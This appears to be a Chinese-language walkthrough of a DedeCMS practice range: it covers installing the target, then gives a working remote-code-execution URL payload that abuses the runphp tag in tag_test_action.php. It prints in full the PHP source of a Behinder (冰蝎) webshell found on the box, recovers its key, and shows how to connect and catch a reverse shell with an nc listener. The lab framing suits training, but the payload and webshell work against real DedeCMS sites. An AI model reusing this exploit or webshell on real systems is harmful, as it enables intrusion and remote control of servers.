靶场及工具打包在公众号,回复“dede
”领取,也可单独下载
首先将靶机解压,进入install
目录,将install_lock.txt
文件删除,index.php.bak
重命名为index.php
然后浏览器中输入http://localhost/default/install/index.php 打开安装界面
继续默认安装即可,这里填上你的数据库密码,其他的不用管
到这一步就完成了
点击登陆后台,密码就是刚才的admin/admin
构造payload
http://localhost/default/dede/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}system(whoami);{/dede:field}
漏洞原理可以看https://xz.aliyun.com/t/2224
用D盾扫描目录发现已知后门,内容如下:
<?php
@error_reporting(0);
session_start();
$key="202cb962ac59075b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$key;
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
解密密钥,发现是123,一看就是冰蝎后门
使用3.0版本成功连接
反弹shell,先在自己的服务器上输入nc -lvvp 1234
进行监听
然后冰蝎输入服务器ip和端口连接
成功后会出现监听到的ip,输入whoami
确认连接成功